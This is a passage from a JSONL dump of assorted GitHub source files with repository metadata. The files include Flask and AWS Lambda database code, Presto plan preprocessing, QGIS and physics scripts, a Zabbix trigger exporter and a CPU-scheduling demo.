%H:%M:%S.%f')\n else:\n return datetime.datetime.utcnow()\n\n def get_opr_last_modified(self):\n from server.models import LastModifiedEntry\n entry = LastModifiedEntry.query.filter_by(event='all', key=\"opr\").first()\n if entry:\n return datetime.datetime.strptime(entry.last_modified, '%Y-%m-%d %H:%M:%S.%f')\n else:\n return datetime.datetime.utcnow()\n\n def get_event_last_modified(self, event_id):\n from server.models import LastModifiedEntry\n entry = LastModifiedEntry.query.filter_by(event=event_id, key=\"event\").first()\n if entry:\n return datetime.datetime.strptime(entry.last_modified, '%Y-%m-%d %H:%M:%S.%f')\n else:\n return datetime.datetime.utcnow()\n\n def get_stats(self, event_id):\n from server.models import AnalysisEntry\n entries = AnalysisEntry.query.filter_by(event=event_id, key=\"avg\").all()\n oprs = self.get_event_oprs(event_id)\n calc = AnalysisEntry.query.filter_by(event=event_id, key=\"calc\").all()\n calc = dict(zip(map(lambda x: x.team, calc), map(lambda x: x.get_data(), calc)))\n for entry in entries:\n data = entry.get_data()\n team_number = data[\"team_number\"][\"value\"]\n if team_number in oprs.keys():\n opr_dict = oprs[team_number]\n data[\"opr\"] = dict(zip(opr_dict.keys(), map(lambda x: round(x, 1), opr_dict.values())))\n if team_number in calc.keys():\n data[\"calc\"] = calc[int(team_number)]\n entry.set_data(data)\n return dict([(str(elem.team), elem.get_data()) for elem in entries])\n\n def get_avg_data(self, event_id):\n from server.models import AnalysisEntry\n entries = AnalysisEntry.query.filter_by(event=event_id, key=\"avg\").all()\n return dict([(str(elem.team), elem.get_data()) for elem in entries])\n\n def get_calculated_data(self, event_id):\n from server.models import AnalysisEntry\n entries = AnalysisEntry.query.filter_by(event=event_id, key=\"calc\").all()\n return dict([(str(elem.team), elem.get_data()) for elem in entries])\n\n def get_pit_scouting(self, event_id):\n from server.models import AnalysisEntry\n entries = AnalysisEntry.query.filter_by(event=event_id, key=\"pit\").all()\n return dict([(str(elem.team), elem.get_data()) for elem in entries])\n","repo_name":"kForth/ClooneyWebServer","sub_path":"server/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19153343772","text":"import os\nimport uuid\n\nimport psycopg2\nimport ujson\n\n\ndef lambda_handler(event: dict, context: object) -> bool:\n for record in event[\"Records\"]:\n process_record(record, context.aws_request_id)\n\n return True\n\n\ndef process_record(record: dict, source: uuid.UUID):\n event_body = ujson.loads(record[\"body\"])[\"Message\"]\n event_body = ujson.loads(event_body)\n\n shipment = {\n \"carrier\": event_body[\"carrier\"],\n \"weight\": event_body[\"weight\"],\n \"length\": event_body[\"length\"],\n \"width\": event_body[\"width\"],\n \"height\": event_body[\"height\"],\n \"is_sortable\": event_body[\"is_sortable\"],\n \"price\": {\n \"amount\": event_body[\"price\"][\"amount\"],\n \"currency\": event_body[\"price\"][\"currency\"],\n },\n }\n\n # There should be some order logic\n\n persist_order(shipment, source)\n\n\ndef persist_order(shipment: dict, source_id: uuid):\n host = os.environ[\"RDS_HOST\"]\n port = os.environ[\"RDS_PORT\"]\n username = os.environ[\"RDS_USERNAME\"]\n password = os.environ[\"RDS_PASSWORD\"]\n\n conn = psycopg2.connect(\n host=host, port=port, database=\"postgres\", user=username, password=password\n 
)\n\n cursor = conn.cursor()\n cursor.execute(\n \"INSERT INTO orders (carrier, weight, length, width, height, is_sortable, price, currency, source) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\",\n (\n shipment[\"carrier\"],\n shipment[\"weight\"],\n shipment[\"length\"],\n shipment[\"width\"],\n shipment[\"height\"],\n shipment[\"is_sortable\"],\n shipment[\"price\"][\"amount\"],\n shipment[\"price\"][\"currency\"],\n source_id,\n ),\n )\n\n conn.commit()\n cursor.close()\n conn.close()\n","repo_name":"sdarmofal/cloudier","sub_path":"src/order/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22510939905","text":"from control_files.fcrb_keys_and_sats import fcrb_sats\nfrom control_files.ustan_keys_and_sats import ustan_sats\nfrom control_files.zmc_keys_and_sats import zmc_sats\nimport copy\n\nustan_diagnostic = {'tag': 'diagnostic', 'source': 'ustan.general', 'fields': ['chi', 'incidence_date', 'site_icd_10', 'name', 'first_seen_date', 'site', 'histology', 'primary', 'metastasis1', 'metastasis2', 'metastasis3', 'cong_heart_fail_flag', 'con_tiss_disease_rheum_flag', 'dementia_flag', 'pulmonary_flag', 'con_tiss_flag', 'diabetes_flag', 'para_hemiplegia_flag',\n 'renal_flag', 'liver_flag', 'aids_hiv_flag', 'cancer_flag', 'charlson_score', 'age', 'side', 'gender', 'age_at_diagnosis', 'weight', 'bmi', 'height', 'ref_hospital', 'stage', 'stage_detail', 'tnm_t', 'tnm_t_detail', 'tnm_n', 'tnm_n_detail', 'tnm_m', 'perf_stat', 'smr01_flag', 'gp_name', 'survival_days', 'gp_id'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nfcrb_diagnostic_1 = {'tag': 'diagnostic', 'source': 'fcrb.diagnostic', 'fields': [\n 'einri', 'patnr', 'falnr', 'pernr', 'lfdnr', 'dkey1'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nfcrb_diagnostic_2 = {'tag': 'diagnostic', 'source': 'fcrb.episode', 'fields': [\n 'patnr', 'falnr'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nfcrb_treatments = {'tag': 'treatments', 'source': 'fcrb.episode', 'fields': ['patnr', 'bekat'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\n\n\nzmc_diagnostic_1 = {'tag': 'diagnostic', 'source': 'zmc.complaints_and_diagnosis', 'fields': ['patnr', 'complaints_and_diagnosis', 'status', 'specialism', 'type',\n 'name_of_diagnosis_or_complaint', 'anatomical_location', 'laterality', 'begin_date', 'end_date'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nzmc_diagnostic_2 = {'tag': 'diagnostic', 'source': 'zmc.bloodpressure', 'fields': ['patnr', 'value', 'position', 'description', 'date', 'systolic_bloodpressure',\n 'diastolic_bloodpressure', 'measurement_method', 'manchette_type', 'measurement_location', 'description'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nzmc_diagnostic_3 = {'tag': 'diagnostic', 'source': 'zmc.weight', 'fields': [\n 'patnr', 'measurement', 'clothes', 'description', 'date'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nzmc_diagnostic_4 = {'tag': 'diagnostic', 'source': 'zmc.length', 'fields': [\n 'patnr', 'measurement', 'description', 'date'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nzmc_diagnostic_5 = {'tag': 'diagnostic', 'source': 'zmc.registered_events', 'fields': [\n 'patnr', 'type', 'method', 'anatomical_location', 'laterality', 'start_date', 'end_date', 'indication', 'requested_by', 'date'], 'key_lookup': {}, 'table': True, 'graph': 
False, 'image': False}\nzmc_diagnostic_6 = {'tag': 'diagnostic', 'source': 'zmc.functional_or_mental_state', 'fields': [\n 'patnr', 'name', 'value', 'date'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\nzmc_diagnostic_7 = {'tag': 'diagnostic', 'source': 'zmc.patient_details', 'fields': [\n 'patnr', 'nname', 'nnams', 'vname', 'titel', 'gschl', 'gbdat', 'natio'], 'key_lookup': {}, 'table': True, 'graph': False, 'image': False}\n\nustan_tags = [ustan_diagnostic]\nfcrb_tags = [fcrb_diagnostic_1,\n fcrb_diagnostic_2,\n fcrb_treatments]\n \nzmc_tags = [zmc_diagnostic_1,\n zmc_diagnostic_2,\n zmc_diagnostic_3,\n zmc_diagnostic_4,\n zmc_diagnostic_5,\n zmc_diagnostic_6,\n zmc_diagnostic_7]\n\ndef hospital_picker(hospital):\n if hospital == 'FCRB':\n return copy.deepcopy(fcrb_sats), fcrb_tags\n elif hospital == 'USTAN':\n return copy.deepcopy(ustan_sats), ustan_tags\n elif hospital == 'ZMC':\n return copy.deepcopy(zmc_sats), zmc_tags\n\ndef table_picker(tag_names, tags):\n return [tag['source'] for tag in tags if tag['tag'] in [tag_name for tag_name in tag_names]]\n\ndef sat_picker(tables, sat_definitions):\n sat_names = []\n for table in tables:\n try:\n sat_definitions[table].pop('links')\n except:\n print(f\"Already popped: {table}\")\n sat_names.extend([sat_name for sat_name in sat_definitions[table]])\n return sat_names\n\n# tables, tags = hospital_picker('FCRB')\n# table_names = table_picker('diagnostic',tags )\n# print(table_names)\n# sats = []","repo_name":"SkinnyPigeon/new_dv_tests","sub_path":"development/tags_and_sats.py","file_name":"tags_and_sats.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17211258017","text":"from sklearn.externals import joblib\nfrom flask import Flask, request\nfrom jinja2 import Template\n\np = joblib.load('sentiment-model.pkl')\n\napp = Flask(__name__)\n\ndef pred(text):\n return p.predict([text])[0]\n\n@app.route('/')\ndef index():\n text = request.args.get('text')\n if text:\n prediction = pred(text)\n else:\n prediction = \"\"\n\n template = Template(\"\"\"\n \n \n

<html>\n    <head>\n        <title>Sentiment Analysis</title>\n    </head>\n    <body>\n        <form>\n        Type a message here:\n        <input name=\"text\">\n        <input type=\"submit\">\n        </form>\n        <p>\n        Your input is: {{ text }}\n        </p>\n        <p>\n        Prediction: {{ prediction }}\n        </p>\n    </body>\n</html>
    \n \n \n \"\"\")\n\n return template.render(prediction=prediction, text=text)\n\n\nif __name__ == '__main__':\n app.run(port=8000)\n","repo_name":"anaerobeth/ml-mastery","sub_path":"pipeline-server.py","file_name":"pipeline-server.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38181308855","text":"import numpy as np\nfrom utils.custom_logging import logger\nfrom inference.preprocessing.preprocessor import QueryPlanPreprocessor\n\n# The following operators can be found in Presto query plans\nOUTPUT = 'Output'\nAGGREGATE = 'AGGREGATE'\nAGGREGATE_FINAL = 'Aggregate(FINAL)'\nAGGREGATE_PARTIAL = 'Aggregate(PARTIAL)'\nLOCAL_EXCHANGE = 'LocalExchange'\nREMOTE_EXCHANGE = 'RemoteStreamingExchange'\nFILTER = 'Filter'\nTABLE_SCAN = 'TableScan'\nPROJECT = 'Project'\nINNER_JOIN = 'InnerJoin'\nCROSS_JOIN = 'CrossJoin'\nSEMI_JOIN = 'SemiJoin'\nLEFT_JOIN = 'LeftJoin'\nRIGHT_JOIN = 'RightJoin'\nVALUES = 'Values'\n\n# Composite operators\nSCAN_FILTER_PROJECT = 'ScanFilterProject'\nSCAN_FILTER = 'ScanFilter'\nSCAN_PROJECT = 'ScanProject'\n\nUNARY_OPERATORS = [OUTPUT, AGGREGATE, AGGREGATE_PARTIAL, AGGREGATE_FINAL, LOCAL_EXCHANGE, REMOTE_EXCHANGE, SCAN_FILTER_PROJECT, FILTER, PROJECT, TABLE_SCAN,\n VALUES]\nBINARY_OPERATORS = [INNER_JOIN, CROSS_JOIN, SEMI_JOIN, LEFT_JOIN, RIGHT_JOIN]\nLEAF_TYPES = [TABLE_SCAN, VALUES]\nENCODED_TYPES = list(sorted(list(set(UNARY_OPERATORS + BINARY_OPERATORS) - {OUTPUT, SCAN_FILTER_PROJECT, SCAN_FILTER, SCAN_PROJECT})))\n\n# The following attributes can be found in each node of a presto query plan\nCHILDREN = 'children'\nNODE_TYPE = 'name'\nESTIMATES = 'estimates'\nTABLE_NAME = 'tableName'\nPREPROCESSED = 'preprocessed'\n\n# The following attributes can be found in the presto query plan statistics of leaf nodes (e.g. 
TableScan, ScanFilterProject, etc.)\nROWS = 'rows'\nROW_SIZE = 'rowsSize'\nCPU_COST = 'cpuCost'\nMAX_MEMORY = 'maxMemory'\nMAX_MEMORY_OUTPUT = 'maxMemoryWhenOutputting'\nNETWORK_COST = 'networkCost'\n\n\nclass MalformedQueryPlanException(Exception):\n pass\n\n\nclass TreeBuilderException(Exception):\n def __init__(self, msg):\n Exception.__init__(self, msg)\n\n\ndef is_binary_operator(node):\n return node[NODE_TYPE] in BINARY_OPERATORS\n\n\ndef is_unary_operator(node):\n return node[NODE_TYPE] in UNARY_OPERATORS\n\n\ndef is_leaf_operator(node):\n return node[NODE_TYPE] in LEAF_TYPES\n\n\nclass TreeBuilder:\n \"\"\"This class gets invoked by the TreeFeaturizer; it preprocesses a query plan before it is fed to the TCNN\"\"\"\n\n def __init__(self, stats_extractor, relations):\n self.__stats = stats_extractor\n # pylint: disable=unused-private-member\n self.__relations = sorted(relations)\n\n def __featurize_binary_operator(self, node):\n assert is_binary_operator(node)\n arr = np.zeros(len(ENCODED_TYPES) + 1)\n arr[ENCODED_TYPES.index(node[NODE_TYPE])] = 1\n return np.concatenate((arr, self.__stats(node)))\n\n def __featurize_unary_operator(self, node):\n assert is_unary_operator(node)\n arr = np.zeros(len(ENCODED_TYPES) + 1)\n arr[ENCODED_TYPES.index(node[NODE_TYPE])] = 1\n return np.concatenate((arr, self.__stats(node)))\n\n def __featurize_null_operator(self):\n arr = np.zeros(len(ENCODED_TYPES) + 1)\n arr[-1] = 1 # declare as null vector\n return np.concatenate((arr, self.__stats.get_null_stats()))\n\n def plan_to_feature_tree(self, node):\n \"\"\"This method recursively traverses the query plan and returns a feature tree\"\"\"\n children = node[CHILDREN] if CHILDREN in node else []\n # do not encode output nodes and combined table_scans\n if node[NODE_TYPE] not in ENCODED_TYPES:\n assert len(children) == 1\n return self.plan_to_feature_tree(children[0])\n\n if is_binary_operator(node):\n assert len(children) == 2\n featurized_node = self.__featurize_binary_operator(node)\n left = self.plan_to_feature_tree(children[0])\n right = self.plan_to_feature_tree(children[1])\n return featurized_node, left, right\n\n if is_leaf_operator(node):\n assert not children\n return self.__featurize_unary_operator(node)\n\n if is_unary_operator(node):\n child = self.plan_to_feature_tree(children[0])\n assert len(children) <= 1\n return self.__featurize_unary_operator(node), child, self.__featurize_null_operator()\n\n raise TreeBuilderException('Node was neither transparent, nor a join or a scan: ' + str(node))\n\n\ndef _normalize(x, lo, hi):\n if hi == lo:\n logger.warning('[WARNING] normalization divide by zero')\n return np.infty if (np.log(x + 1) - lo) > 0 else -np.infty\n return (np.log(x + 1) - lo) / (hi - lo)\n\n\ndef _get_buffer_count_for_leaf(leaf, buffers):\n total = 0\n if TABLE_NAME in leaf:\n total += buffers.get(leaf[TABLE_NAME], 0)\n\n if 'Index Name' in leaf:\n total += buffers.get(leaf['Index Name'], 0)\n\n return total\n\n\nclass StatExtractor:\n \"\"\"Extract statistics such as min and max from a query plan\"\"\"\n\n def __init__(self, fields, mins, maxs):\n self.__fields = fields\n self.__mins = mins\n self.__maxs = maxs\n\n def __call__(self, inp):\n estimates = inp[ESTIMATES] if ESTIMATES in inp else {}\n res = []\n for f, lo, hi in zip(self.__fields, self.__mins, self.__maxs):\n if f not in estimates or estimates[f] == 0.0 or estimates[\n f] == 'NaN':\n res += [0, 0]\n else:\n res += [1, _normalize(np.log(estimates[f] + 1), lo, hi)]\n return res\n\n def get_null_stats(self):\n # 
create null value\n return [0.0] * (2 * len(self.__fields))\n\n\ndef _get_plan_stats(data):\n costs = []\n rows = []\n\n def process_estimates(node):\n estimates = node[ESTIMATES]\n cpu_estimate = estimates[CPU_COST]\n rows_estimate = estimates[ROWS]\n if not cpu_estimate in (0, 'NaN'):\n costs.append(cpu_estimate)\n if not rows_estimate in (0, 'NaN'):\n rows.append(rows_estimate)\n\n def recurse(node):\n if ESTIMATES in node:\n process_estimates(node)\n\n if CHILDREN in node:\n for child in node[CHILDREN]:\n recurse(child)\n\n for plan in data:\n recurse(plan)\n\n costs = np.array(costs)\n rows = np.array(rows)\n\n costs = np.log(costs + 1)\n rows = np.log(rows + 1)\n\n costs_min = 0 if len(costs) == 0 else np.min(costs)\n costs_max = 1 if len(costs) == 0 else np.max(costs)\n rows_min = 0 if len(rows) == 0 else np.min(rows)\n rows_max = 1 if len(rows) == 0 else np.max(rows)\n\n return StatExtractor([CPU_COST, ROWS], [costs_min, rows_min], [costs_max, rows_max])\n\n\ndef _get_all_relations(data):\n all_rels = []\n\n def recurse(plan):\n if TABLE_NAME in plan:\n yield plan[TABLE_NAME]\n\n if CHILDREN in plan:\n for child in plan[CHILDREN]:\n yield from recurse(child)\n\n for plan in data:\n all_rels.extend(list(recurse(plan)))\n\n return set(all_rels)\n\n\ndef _attach_buf_data(tree):\n if 'Buffers' not in tree:\n return\n\n buffers = tree['Buffers']\n\n def recurse(n):\n if 'Plans' in n:\n for child in n['Plans']:\n recurse(child)\n return\n\n # it is a leaf\n n['Buffers'] = _get_buffer_count_for_leaf(n, buffers)\n\n recurse(tree['Plan'])\n\n\ndef _preprocess_scan_filter_project(plan):\n # assert len(plan['estimates']) == 3\n scan_node = {\n NODE_TYPE: TABLE_SCAN,\n }\n filter_node = {\n NODE_TYPE: FILTER,\n CHILDREN: [scan_node],\n }\n plan[NODE_TYPE] = PROJECT\n plan[CHILDREN] = [filter_node]\n plan[PREPROCESSED] = True\n\n\ndef _preprocess_scan_project(plan):\n scan_node = {NODE_TYPE: TABLE_SCAN}\n plan[NODE_TYPE] = PROJECT\n plan[CHILDREN] = [scan_node]\n plan[PREPROCESSED] = True\n\n\ndef _preprocess_scan_filter(plan):\n scan_node = {NODE_TYPE: TABLE_SCAN}\n plan[NODE_TYPE] = FILTER\n plan[CHILDREN] = [scan_node]\n plan[PREPROCESSED] = True\n\n\nclass PrestoPlanPreprocessor(QueryPlanPreprocessor):\n \"\"\"\"Transforms PrestoDB query plans into a form processable by the TCNNs\"\"\"\n\n def __init__(self):\n super().__init__()\n self.__tree_builder = None\n\n def fit(self, trees):\n for t in trees:\n self.preprocess(t)\n _attach_buf_data(t)\n all_rels = _get_all_relations(trees)\n stats_extractor = _get_plan_stats(trees)\n self.__tree_builder = TreeBuilder(stats_extractor, all_rels)\n\n def transform(self, trees):\n for tree in trees:\n self.preprocess(tree)\n _attach_buf_data(tree)\n return [self.__tree_builder.plan_to_feature_tree(tree) for tree in trees]\n\n def preprocess(self, plan):\n # Check if this plan has been preprocessed already\n if PREPROCESSED in plan and plan[PREPROCESSED]:\n return\n\n if plan[NODE_TYPE] == SCAN_FILTER_PROJECT:\n _preprocess_scan_filter_project(plan)\n return\n elif plan[NODE_TYPE] == SCAN_PROJECT:\n _preprocess_scan_project(plan)\n return\n elif plan[NODE_TYPE] == SCAN_FILTER:\n _preprocess_scan_filter(plan)\n return\n if ESTIMATES in plan:\n if len(plan[ESTIMATES]) == 0:\n plan.pop(ESTIMATES, None)\n elif len(plan[ESTIMATES]) == 1:\n plan[ESTIMATES] = plan[ESTIMATES][0]\n else:\n raise MalformedQueryPlanException('Multiple estimates for node!')\n\n plan[PREPROCESSED] = True\n if CHILDREN in plan:\n for child in plan[CHILDREN]:\n 
self.preprocess(child)\n","repo_name":"IntelLabs/Auto-Steer","sub_path":"inference/preprocessing/preprocess_presto_plans.py","file_name":"preprocess_presto_plans.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"15278651638","text":"# -*- coding: latin1 -*-\n# Import the PyQt and QGIS libraries\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\n\nclass RectangularPoint:\n    \n    \n    def point(p1, p2, dX, dY, inverse):\n        \n        # The base point is p1 (i.e. always the left point)\n        # The direction vector is: p2 - p1\n        \n        if dX == 0:\n            if inverse == True:\n                pA = QgsPoint()\n                pA.setX(p2.x())\n                pA.setY(p2.y())\n            else:\n                pA = QgsPoint()\n                pA.setX(p1.x())\n                pA.setY(p1.y())\n        else:\n            dA = ( (p1.x()-p2.x())**2 + (p1.y()-p2.y())**2 )**0.5\n            \n            if inverse == True:\n                xA = p2.x() - dX*(p2.x()-p1.x())/dA \n                yA = p2.y() - dX*(p2.y()-p1.y())/dA \n                pA = QgsPoint(xA, yA) \n            else:\n                xA = p1.x() + dX*(p2.x()-p1.x())/dA \n                yA = p1.y() + dX*(p2.y()-p1.y())/dA \n                pA = QgsPoint(xA, yA) \n        \n        \n        # The base point is now pA\n        # The direction vector is p1 - pA, but with x/y swapped\n        \n        if dX == 0:\n            if inverse == True: \n                dO = ( (p1.x()-p2.x())**2 + (p1.y()-p2.y())**2 )**0.5\n                xO = p2.x() + dY*(p2.y()-p1.y())/dO \n                yO = p2.y() - dY*(p2.x()-p1.x())/dO \n                pO = QgsPoint(xO, yO) \n            else:\n                dO = ( (p1.x()-p2.x())**2 + (p1.y()-p2.y())**2 )**0.5\n                xO = p1.x() + dY*(p1.y()-p2.y())/dO \n                yO = p1.y() - dY*(p1.x()-p2.x())/dO \n                pO = QgsPoint(xO, yO) \n        \n        else:\n            dO = dX\n            if inverse == True:\n                xO = pA.x() + dY*(p2.y()-pA.y())/dO \n                yO = pA.y() - dY*(p2.x()-pA.x())/dO \n                pO = QgsPoint(xO, yO) \n            else:\n                xO = pA.x() + dY*(p1.y()-pA.y())/dO \n                yO = pA.y() - dY*(p1.x()-pA.x())/dO \n                pO = QgsPoint(xO, yO) \n        \n        return pO\n    \n    point = staticmethod(point)\n    \n","repo_name":"geopython/CadTools","sub_path":"tools/rectangularpoint.py","file_name":"rectangularpoint.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"23445079980","text":"import numpy as np\r\nimport matplotlib.pyplot as plt \r\nimport cmath \r\nimport functools\r\n\r\ncm = plt.cm.get_cmap('plasma')\r\n\r\n#parameters\r\nt1= 2*np.pi\r\nt = np.linspace(0,2*np.pi,200)\r\nn = 1\r\nl = len(t)\r\nK = np.arange(-np.pi,np.pi,0.05*np.pi)\r\nL = len(K)\r\n\r\n#pauli matrix\r\ns0 = np.matrix([[1,0],[0,1]])\r\ns1 = np.matrix([[0,1],[1,0]])\r\ns2 = np.matrix([[0,-1j],[1j,0]])\r\ns3 = np.matrix([[1,0],[0,-1]])\r\n\r\n#Hamiltonian\r\ndef H(k,t2):\r\n    a0 = np.cos(t1)*np.cos(t2)-np.sin(t1)*np.sin(t2)*np.cos(n*k)\r\n    a1 = np.cos(t1)*np.sin(t2)*np.cos(n*k)+np.sin(t1)*np.cos(t2)\r\n    a2 = np.cos(t1)*np.sin(t2)*np.sin(n*k)\r\n    a3 = -np.sin(t1)*np.sin(t2)*np.sin(n*k)\r\n    hamiltonian = (a0*s0+1j*(a1*s1+a2*s2+a3*s3))\r\n    return hamiltonian\r\n\r\n#draw quasienergy spectrum\r\ndef main():\r\n    for j in range(L):\r\n        k = K[j]\r\n        zero = [0 for index in range(l)]\r\n        zerominus = [0 for index in range(l)]\r\n        for i in range(l):\r\n            t2 = t[i]\r\n            eigenvalue, eigenvector = np.linalg.eig(H(k,t2))\r\n            eigenvalue.sort()\r\n            zero[i] = (-1j*np.log(eigenvalue[1])).real\r\n            zerominus[i] = -zero[i]\r\n        plt.scatter(t/np.pi, zerominus, c=zerominus, cmap=cm)\r\n        plt.scatter(t/np.pi, zero, c=zero, cmap=cm)\r\n    y = 0*t\r\n    plt.plot(t/np.pi,y,c='black')\r\n    plt.xlabel(\"t2\", fontdict={'size': 16})\r\n    plt.ylabel(\"energy\", fontdict={'size':16})\r\n    plt.title(\"PBC\", fontdict={'size': 20})\r\n    
plt.show()\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"Hiloxik/FBOTP","sub_path":"Total Codes/quasienergy spectrum.py","file_name":"quasienergy spectrum.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"23594017382","text":"#!/bin/python\nfrom pyzabbix import ZabbixAPI\nimport csv\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nhostid = []\nhostname = []\ntriggers=[]\nnomehosttrigger = []\nseveridade = []\n\ndicionario = {'1':'Information', '2':'Warning', '3':'Average', '4':'High', '5':'Disaster'}\n\nzapi = ZabbixAPI('http://localhost/zabbix')\nzapi.login('Admin', 'zabbix')\n#print(zapi.api_version())\n\n\nfor l in zapi.host.get(output='extend'):\n hostname.append(l['host'])\n\ntriggers.append('Trigger')\nnomehosttrigger.append('Hostname')\nseveridade.append('Severidade')\n\n\nfor x in hostname:\n for item in zapi.trigger.get(output='extend', filter={'host':x}):\n nomehosttrigger.append(x)\n triggers.append(item['description'])\n severidade.append(dicionario[item['priority']])\n\n\n#data=pd.DataFrame({'Hostname':nomehosttrigger,'Triggers':triggers,'Severidade':severidade})\n#data.to_csv('triggers_hosts.csv',index=False)\n\ncsv_out = open('triggers_hosts.csv','wb')\n\nmywriter = csv.writer(csv_out)\n\nfor row in zip(nomehosttrigger,triggers,severidade):\n mywriter.writerow(row)\n\ncsv_out.close()\n","repo_name":"pdoshida/zabbix_pyzabbix","sub_path":"get_Triggers_Hosts.py","file_name":"get_Triggers_Hosts.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32394091277","text":"# Non-preemptive SJF(SHORTEST JOB FIRST) Scheduling with Arrival Time\nprint(\"Non-preemptive SJF Scheduling without Arrival Time\")\nimport pandas as pd\nimport matplotlib.pyplot as plt\ndef MakeDIctionary_SJF(AT,BT,n,Process_Name,d={}):\n for index in range(n):\n l = [BT[index],AT[index]]\n d[Process_Name[index]] = l\n d = sorted(d.items(), key=lambda x: x[1][0])\n AT = [i[1][0] for i in d]\n BT = [i[1][1] for i in d]\n return d,AT\ndef TurnAroundTime(BT,n,AT,TAT=[],CT=[]):\n TAT = [sum(BT[0:i+1])-AT[i] for i in range(n)]\n return TAT,sum(TAT)/n\ndef WaitingTime(TAT,BT,n):\n WT = [TAT[i]-BT[i] for i in range(n)]\n return WT,sum(WT)/n\n\nn = int(input(\"Enter number of process: \"))\nProcess_Name = [\"P\"+str(i+1) for i in range(n)]\nBT = [int(input(f\"Enter Burst Time(ms) for process {x+1}:- \")) for x in range(n)]\nAT=[0 for i in range(n)]\nd,BT = MakeDIctionary_SJF(AT,BT,n,Process_Name)\nTAT,ATAT = TurnAroundTime(BT,n,AT)\nWT,AWT = WaitingTime(TAT,BT,n)\nProcess_Name = [i[0] for i in d]\ndata = {\"Name\" : Process_Name,\n \"BT\" : BT,\n \"AT\" : AT,\n \"TAT\" : TAT,\n \"WT\" : WT}\ndf = pd.DataFrame(data)\nprint(df)\ndef visualizeSJF(Process_Name,BT):\n x = pd.DataFrame({\"c\":[BT[0]]},index=[\"Process\"])\n for i in range(len(BT)):\n x[Process_Name[i]] = BT[i]\n x.drop('c',inplace=True,axis=1)\n x.plot.barh(stacked=True)\nvisualizeSJF(Process_Name,BT)\nprint(f\"Average Turn Around Time: {ATAT}\")\nprint(f\"Average Waiting time: {AWT}\")\n","repo_name":"vaasu2002/Operating-System","sub_path":"CPU Scheduling/SJF/Non-preemptive No AT.py","file_name":"Non-preemptive No AT.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73247452534","text":"from datetime import datetime\n\nfrom 
odoo.tests import tagged\nfrom odoo.tests.common import TransactionCase\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\n\n\n@tagged(\"-standard\", \"test_rj\")\nclass TestWorkOrder(TransactionCase):\n def setUp(self):\n super(TestWorkOrder, self).setUp()\n\n def test(self):\n self.vehicle_obj = self.env[\"fleet.vehicle\"]\n fleet_brand = self.env.ref(\"fleet.brand_audi\")\n fleet_model = self.env.ref(\"fleet.model_a1\")\n self.service_obj = self.env[\"fleet.vehicle.log.services\"]\n self.env.ref(\"fleet.type_service_service_1\")\n workshop_id = self.env.ref(\"base.res_partner_1\")\n cr_dt = datetime.today().strftime(DEFAULT_SERVER_DATETIME_FORMAT)\n\n self.vehicle = self.vehicle_obj.create(\n {\n \"f_brand_id\": fleet_brand.id,\n \"model_id\": fleet_model.id,\n \"license_plate\": \"MH-04-7777\",\n \"odometer\": 3000,\n \"odometer_unit\": \"kilometers\",\n \"fuel_type\": \"diesel\",\n }\n )\n self.assertTrue(self.vehicle, \"vehicle Type not created\")\n self.workorder = self.service_obj.create(\n {\n \"vehicle_id\": self.vehicle.id,\n # 'cost_subtype_id': service_cost_id.id,\n \"amount\": 2000,\n \"priority\": \"normal\",\n \"date_complete\": cr_dt,\n \"team_id\": workshop_id.id,\n }\n )\n self.assertTrue(self.workorder, \"workorder not created\")\n","repo_name":"JayVora-SerpentCS/fleet_management","sub_path":"fleet_operations/tests/test_workorder.py","file_name":"test_workorder.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"13651650861","text":"global ADDRESS\nADDRESS = \"127.0.0.1\"\n\nglobal PORT\nPORT = 9093\n\nglobal ITERATIONS\nITERATIONS = 16\n\nglobal sampleAttackFile\nsampleAttackFile = \"lenna.pgm\"\n\nglobal encodedAttackFile\nencodedAttackFile = \"attack_encoded.pgm\"\n\nglobal decodedAttackFile\ndecodedAttackFile = \"attack_decoded.pgm\"","repo_name":"giacomostocco/Feistel","sub_path":"AttackUtil.py","file_name":"AttackUtil.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37218630661","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass 